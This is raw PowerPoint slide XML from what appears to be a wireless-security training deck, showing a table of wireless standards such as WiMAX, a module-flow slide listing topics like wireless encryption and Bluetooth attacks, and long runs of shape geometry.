                        <a:t> GFSK, BPSK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" sz="15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0.02, 0.04, 0.25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1 – 100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5686114"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="371423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
                        <a:t>802.16 (WiMAX)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2 – 11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500" dirty="0"/>
                        <a:t>SOFDMA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dirty="0"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" baseline="0" dirty="0"/>
                        <a:t>4 – 1000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500" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>1609.34 - 9656.06 (1-6</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" baseline="0" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> miles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1500" kern="1200" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="15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74788287"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl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38ADFB8-D43D-432B-867D-CA412D2B3FE2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141413" y="193833"/>
            <a:ext cx="9909175" cy="644367"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN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Wireless Standards</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54341404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Rectangle 75">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492F9220-FD9E-489E-AF7E-DBE5DD5CF61B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7714264" y="2297501"/>
            <a:ext cx="3761456" cy="99433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>
            <a:scene3d>
              <a:camera prst="perspectiveAbove"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene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4523584" y="221787"/>
            <a:ext cx="3144836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rPr>
              <a:t>Module Flow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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85" name="Oval 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3632813" y="3354600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3"/>
          </a:solidFill>
          <a:ln w="38100"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7" name="Oval 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2877160" y="4885888"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="3810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8" name="Oval 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7900848" y="2514600"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4"/>
          </a:solidFill>
          <a:ln w="381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9" name="Oval 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8782072" y="4207543"/>
            <a:ext cx="551839" cy="551839"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="381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B9016AFD-5B5A-4813-A53E-5D4C3615CEC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8578635" y="2476299"/>
            <a:ext cx="2897085" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Different Types of Wireless Encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403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B14C850-384D-43ED-A074-9D81FF2B7B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9430979" y="4194087"/>
            <a:ext cx="2532421" cy="69403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>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Bluetooth Attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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4F181BEB-E04A-42A9-9AC7-2704A1A580BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="496386" y="3264450"/>
            <a:ext cx="3083372" cy="69403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 algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Discuss Wireless Network-Specific Attack Techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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178D3AB4-6CCD-4627-81A0-952F323A0B73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1942730" y="1637194"/>
            <a:ext cx="2418764" cy="61555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 algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Understand Wireless Terminology</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700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</a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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7CEA977D-F9E3-49EA-AA26-D48AC44B87B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4414470" y="1669051"/>
            <a:ext cx="551839" cy="551839"/>
            <a:chOff x="4150833" y="1613610"/>
            <a:chExt cx="551839" cy="551839"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="105" name="Oval 104"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4150833" y="1613610"/>
              <a:ext cx="551839" cy="551839"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent5"/>
            </a:solidFill>
            <a:ln w="38100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Freeform 167">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86753C4D-EE69-4971-84FE-58F31E5B7B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82955" y="1737961"/>
              <a:ext cx="285358" cy="296356"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 198438 w 58"/>
                <a:gd name="T1" fmla="*/ 162089 h 58"/>
                <a:gd name="T2" fmla="*/ 160803 w 58"/>
                <a:gd name="T3" fmla="*/ 200025 h 58"/>
                <a:gd name="T4" fmla="*/ 37635 w 58"/>
                <a:gd name="T5" fmla="*/ 200025 h 58"/>
                <a:gd name="T6" fmla="*/ 0 w 58"/>
                <a:gd name="T7" fmla="*/ 162089 h 58"/>
                <a:gd name="T8" fmla="*/ 0 w 58"/>
                <a:gd name="T9" fmla="*/ 34487 h 58"/>
                <a:gd name="T10" fmla="*/ 37635 w 58"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 160803 w 58"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 198438 w 58"/>
                <a:gd name="T15" fmla="*/ 34487 h 58"/>
                <a:gd name="T16" fmla="*/ 198438 w 58"/>
                <a:gd name="T17" fmla="*/ 162089 h 58"/>
                <a:gd name="T18" fmla="*/ 167646 w 58"/>
                <a:gd name="T19" fmla="*/ 72423 h 58"/>
                <a:gd name="T20" fmla="*/ 167646 w 58"/>
                <a:gd name="T21" fmla="*/ 58628 h 58"/>
                <a:gd name="T22" fmla="*/ 153961 w 58"/>
                <a:gd name="T23" fmla="*/ 44833 h 58"/>
                <a:gd name="T24" fmla="*/ 143696 w 58"/>
                <a:gd name="T25" fmla="*/ 44833 h 58"/>
                <a:gd name="T26" fmla="*/ 82112 w 58"/>
                <a:gd name="T27" fmla="*/ 106910 h 58"/>
                <a:gd name="T28" fmla="*/ 54742 w 58"/>
                <a:gd name="T29" fmla="*/ 79320 h 58"/>
                <a:gd name="T30" fmla="*/ 44477 w 58"/>
                <a:gd name="T31" fmla="*/ 79320 h 58"/>
                <a:gd name="T32" fmla="*/ 30792 w 58"/>
                <a:gd name="T33" fmla="*/ 93115 h 58"/>
                <a:gd name="T34" fmla="*/ 30792 w 58"/>
                <a:gd name="T35" fmla="*/ 103461 h 58"/>
                <a:gd name="T36" fmla="*/ 75270 w 58"/>
                <a:gd name="T37" fmla="*/ 151743 h 58"/>
                <a:gd name="T38" fmla="*/ 88955 w 58"/>
                <a:gd name="T39" fmla="*/ 151743 h 58"/>
                <a:gd name="T40" fmla="*/ 167646 w 58"/>
                <a:gd name="T41" fmla="*/ 72423 h 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8" h="58">
                  <a:moveTo>
                    <a:pt x="58" y="47"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="53"/>
                    <a:pt x="53" y="58"/>
                    <a:pt x="47" y="58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5" y="58"/>
                    <a:pt x="0" y="53"/>
                    <a:pt x="0" y="4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53" y="0"/>
                    <a:pt x="58" y="4"/>
                    <a:pt x="58" y="10"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="58" y="47"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="49" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="20"/>
                    <a:pt x="50" y="18"/>
                    <a:pt x="49" y="17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4" y="12"/>
                    <a:pt x="43" y="12"/>
                    <a:pt x="42" y="13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4" y="22"/>
                    <a:pt x="13" y="23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8"/>
                    <a:pt x="8" y="29"/>
                    <a:pt x="9" y="30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3" y="45"/>
                    <a:pt x="25" y="45"/>
                    <a:pt x="26" y="44"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="49" y="2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/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Freeform 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D00080F5-AB70-4A18-96ED-06D761FEA3B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3729092" y="3468970"/>
            <a:ext cx="354131" cy="303951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 142082 w 178"/>
              <a:gd name="T1" fmla="*/ 0 h 168"/>
              <a:gd name="T2" fmla="*/ 284163 w 178"/>
              <a:gd name="T3" fmla="*/ 60684 h 168"/>
              <a:gd name="T4" fmla="*/ 260217 w 178"/>
              <a:gd name="T5" fmla="*/ 91026 h 168"/>
              <a:gd name="T6" fmla="*/ 142082 w 178"/>
              <a:gd name="T7" fmla="*/ 38327 h 168"/>
              <a:gd name="T8" fmla="*/ 23946 w 178"/>
              <a:gd name="T9" fmla="*/ 91026 h 168"/>
              <a:gd name="T10" fmla="*/ 0 w 178"/>
              <a:gd name="T11" fmla="*/ 60684 h 168"/>
              <a:gd name="T12" fmla="*/ 142082 w 178"/>
              <a:gd name="T13" fmla="*/ 0 h 168"/>
              <a:gd name="T14" fmla="*/ 142082 w 178"/>
              <a:gd name="T15" fmla="*/ 95817 h 168"/>
              <a:gd name="T16" fmla="*/ 225095 w 178"/>
              <a:gd name="T17" fmla="*/ 138934 h 168"/>
              <a:gd name="T18" fmla="*/ 204342 w 178"/>
              <a:gd name="T19" fmla="*/ 166082 h 168"/>
              <a:gd name="T20" fmla="*/ 142082 w 178"/>
              <a:gd name="T21" fmla="*/ 134144 h 168"/>
              <a:gd name="T22" fmla="*/ 79821 w 178"/>
              <a:gd name="T23" fmla="*/ 166082 h 168"/>
              <a:gd name="T24" fmla="*/ 59068 w 178"/>
              <a:gd name="T25" fmla="*/ 138934 h 168"/>
              <a:gd name="T26" fmla="*/ 142082 w 178"/>
              <a:gd name="T27" fmla="*/ 95817 h 168"/>
              <a:gd name="T28" fmla="*/ 142082 w 178"/>
              <a:gd name="T29" fmla="*/ 191634 h 168"/>
              <a:gd name="T30" fmla="*/ 180396 w 178"/>
              <a:gd name="T31" fmla="*/ 229960 h 168"/>
              <a:gd name="T32" fmla="*/ 142082 w 178"/>
              <a:gd name="T33" fmla="*/ 268287 h 168"/>
              <a:gd name="T34" fmla="*/ 103767 w 178"/>
              <a:gd name="T35" fmla="*/ 229960 h 168"/>
              <a:gd name="T36" fmla="*/ 142082 w 178"/>
              <a:gd name="T37" fmla="*/ 191634 h 16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78" h="168">
                <a:moveTo>
                  <a:pt x="89" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="124" y="0"/>
                  <a:pt x="156" y="15"/>
                  <a:pt x="178" y="38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45" y="37"/>
                  <a:pt x="119" y="24"/>
                  <a:pt x="89" y="24"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="24"/>
                  <a:pt x="33" y="37"/>
                  <a:pt x="15" y="57"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                  <a:pt x="0" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="15"/>
                  <a:pt x="54" y="0"/>
                  <a:pt x="89" y="0"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="60"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="110" y="60"/>
                  <a:pt x="129" y="71"/>
                  <a:pt x="141" y="87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19" y="92"/>
                  <a:pt x="105" y="84"/>
                  <a:pt x="89" y="84"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="73" y="84"/>
                  <a:pt x="59" y="92"/>
                  <a:pt x="50" y="104"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                  <a:pt x="37" y="87"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="71"/>
                  <a:pt x="68" y="60"/>
                  <a:pt x="89" y="60"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="89" y="120"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102" y="120"/>
                  <a:pt x="113" y="131"/>
                  <a:pt x="113" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="157"/>
                  <a:pt x="102" y="168"/>
                  <a:pt x="89" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="168"/>
                  <a:pt x="65" y="157"/>
                  <a:pt x="65" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="131"/>
                  <a:pt x="76" y="120"/>
                  <a:pt x="89" y="120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08" name="Freeform 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EEA836F-6FC0-4F24-B06E-5ADA0E3ACA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281" y="5000730"/>
            <a:ext cx="291473" cy="313875"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 51370 w 462"/>
              <a:gd name="T1" fmla="*/ 67883 h 452"/>
              <a:gd name="T2" fmla="*/ 83086 w 462"/>
              <a:gd name="T3" fmla="*/ 43607 h 452"/>
              <a:gd name="T4" fmla="*/ 83086 w 462"/>
              <a:gd name="T5" fmla="*/ 31469 h 452"/>
              <a:gd name="T6" fmla="*/ 19655 w 462"/>
              <a:gd name="T7" fmla="*/ 39561 h 452"/>
              <a:gd name="T8" fmla="*/ 51370 w 462"/>
              <a:gd name="T9" fmla="*/ 67883 h 452"/>
              <a:gd name="T10" fmla="*/ 27695 w 462"/>
              <a:gd name="T11" fmla="*/ 87664 h 452"/>
              <a:gd name="T12" fmla="*/ 11614 w 462"/>
              <a:gd name="T13" fmla="*/ 55745 h 452"/>
              <a:gd name="T14" fmla="*/ 15634 w 462"/>
              <a:gd name="T15" fmla="*/ 151051 h 452"/>
              <a:gd name="T16" fmla="*/ 27695 w 462"/>
              <a:gd name="T17" fmla="*/ 87664 h 452"/>
              <a:gd name="T18" fmla="*/ 102741 w 462"/>
              <a:gd name="T19" fmla="*/ 15735 h 452"/>
              <a:gd name="T20" fmla="*/ 154558 w 462"/>
              <a:gd name="T21" fmla="*/ 11688 h 452"/>
              <a:gd name="T22" fmla="*/ 67452 w 462"/>
              <a:gd name="T23" fmla="*/ 3596 h 452"/>
              <a:gd name="T24" fmla="*/ 102741 w 462"/>
              <a:gd name="T25" fmla="*/ 15735 h 452"/>
              <a:gd name="T26" fmla="*/ 134456 w 462"/>
              <a:gd name="T27" fmla="*/ 119582 h 452"/>
              <a:gd name="T28" fmla="*/ 110781 w 462"/>
              <a:gd name="T29" fmla="*/ 59342 h 452"/>
              <a:gd name="T30" fmla="*/ 91127 w 462"/>
              <a:gd name="T31" fmla="*/ 55745 h 452"/>
              <a:gd name="T32" fmla="*/ 71472 w 462"/>
              <a:gd name="T33" fmla="*/ 87664 h 452"/>
              <a:gd name="T34" fmla="*/ 134456 w 462"/>
              <a:gd name="T35" fmla="*/ 119582 h 452"/>
              <a:gd name="T36" fmla="*/ 162152 w 462"/>
              <a:gd name="T37" fmla="*/ 147005 h 452"/>
              <a:gd name="T38" fmla="*/ 162152 w 462"/>
              <a:gd name="T39" fmla="*/ 182970 h 452"/>
              <a:gd name="T40" fmla="*/ 174213 w 462"/>
              <a:gd name="T41" fmla="*/ 135317 h 452"/>
              <a:gd name="T42" fmla="*/ 130436 w 462"/>
              <a:gd name="T43" fmla="*/ 135317 h 452"/>
              <a:gd name="T44" fmla="*/ 63431 w 462"/>
              <a:gd name="T45" fmla="*/ 107444 h 452"/>
              <a:gd name="T46" fmla="*/ 47797 w 462"/>
              <a:gd name="T47" fmla="*/ 107444 h 452"/>
              <a:gd name="T48" fmla="*/ 63431 w 462"/>
              <a:gd name="T49" fmla="*/ 195108 h 452"/>
              <a:gd name="T50" fmla="*/ 170192 w 462"/>
              <a:gd name="T51" fmla="*/ 23827 h 452"/>
              <a:gd name="T52" fmla="*/ 122842 w 462"/>
              <a:gd name="T53" fmla="*/ 35515 h 452"/>
              <a:gd name="T54" fmla="*/ 122842 w 462"/>
              <a:gd name="T55" fmla="*/ 47653 h 452"/>
              <a:gd name="T56" fmla="*/ 174213 w 462"/>
              <a:gd name="T57" fmla="*/ 119582 h 452"/>
              <a:gd name="T58" fmla="*/ 205928 w 462"/>
              <a:gd name="T59" fmla="*/ 99352 h 452"/>
              <a:gd name="T60" fmla="*/ 142497 w 462"/>
              <a:gd name="T61" fmla="*/ 147005 h 452"/>
              <a:gd name="T62" fmla="*/ 79066 w 462"/>
              <a:gd name="T63" fmla="*/ 199154 h 452"/>
              <a:gd name="T64" fmla="*/ 146517 w 462"/>
              <a:gd name="T65" fmla="*/ 195108 h 452"/>
              <a:gd name="T66" fmla="*/ 146517 w 462"/>
              <a:gd name="T67" fmla="*/ 151051 h 45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62" h="452">
                <a:moveTo>
                  <a:pt x="115" y="151"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="115" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="124" y="151"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="142" y="132"/>
                  <a:pt x="160" y="115"/>
                  <a:pt x="186" y="97"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="186" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="79"/>
                  <a:pt x="186" y="70"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="53"/>
                  <a:pt x="133" y="44"/>
                  <a:pt x="107" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="44"/>
                  <a:pt x="62" y="62"/>
                  <a:pt x="44" y="88"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="115"/>
                  <a:pt x="71" y="132"/>
                  <a:pt x="89" y="151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="151"/>
                  <a:pt x="107" y="151"/>
                  <a:pt x="115" y="151"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="62" y="195"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="62" y="195"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="186"/>
                  <a:pt x="62" y="186"/>
                  <a:pt x="71" y="177"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54" y="160"/>
                  <a:pt x="35" y="141"/>
                  <a:pt x="26" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="151"/>
                  <a:pt x="0" y="186"/>
                  <a:pt x="0" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="266"/>
                  <a:pt x="9" y="310"/>
                  <a:pt x="35" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="301"/>
                  <a:pt x="54" y="257"/>
                  <a:pt x="71" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71" y="221"/>
                  <a:pt x="62" y="204"/>
                  <a:pt x="62" y="195"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="230" y="35"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="35"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="35"/>
                  <a:pt x="257" y="44"/>
                  <a:pt x="266" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="292" y="35"/>
                  <a:pt x="319" y="35"/>
                  <a:pt x="346" y="26"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="8"/>
                  <a:pt x="275" y="0"/>
                  <a:pt x="230" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="0"/>
                  <a:pt x="177" y="0"/>
                  <a:pt x="151" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="17"/>
                  <a:pt x="186" y="35"/>
                  <a:pt x="204" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="44"/>
                  <a:pt x="221" y="35"/>
                  <a:pt x="230" y="35"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="301" y="266"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="301" y="266"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="257"/>
                  <a:pt x="310" y="257"/>
                  <a:pt x="319" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="301" y="204"/>
                  <a:pt x="275" y="168"/>
                  <a:pt x="248" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="248" y="132"/>
                  <a:pt x="239" y="132"/>
                  <a:pt x="230" y="132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="132"/>
                  <a:pt x="213" y="132"/>
                  <a:pt x="204" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="186" y="141"/>
                  <a:pt x="168" y="151"/>
                  <a:pt x="151" y="168"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="177"/>
                  <a:pt x="160" y="186"/>
                  <a:pt x="160" y="195"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="204"/>
                  <a:pt x="160" y="213"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="204" y="239"/>
                  <a:pt x="248" y="257"/>
                  <a:pt x="301" y="266"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="363" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="363" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="336"/>
                  <a:pt x="363" y="354"/>
                  <a:pt x="363" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="372"/>
                  <a:pt x="363" y="389"/>
                  <a:pt x="363" y="407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="399" y="380"/>
                  <a:pt x="434" y="336"/>
                  <a:pt x="443" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="426" y="301"/>
                  <a:pt x="408" y="301"/>
                  <a:pt x="390" y="301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="390" y="319"/>
                  <a:pt x="381" y="327"/>
                  <a:pt x="363" y="327"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="292" y="301"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="292" y="301"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="239" y="292"/>
                  <a:pt x="186" y="266"/>
                  <a:pt x="142" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="133" y="239"/>
                  <a:pt x="124" y="248"/>
                  <a:pt x="115" y="248"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="248"/>
                  <a:pt x="107" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="79" y="283"/>
                  <a:pt x="71" y="327"/>
                  <a:pt x="62" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="89" y="398"/>
                  <a:pt x="115" y="425"/>
                  <a:pt x="142" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="380"/>
                  <a:pt x="230" y="327"/>
                  <a:pt x="292" y="301"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="381" y="53"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="381" y="53"/>
                </a:lnTo>
                <a:cubicBezTo>
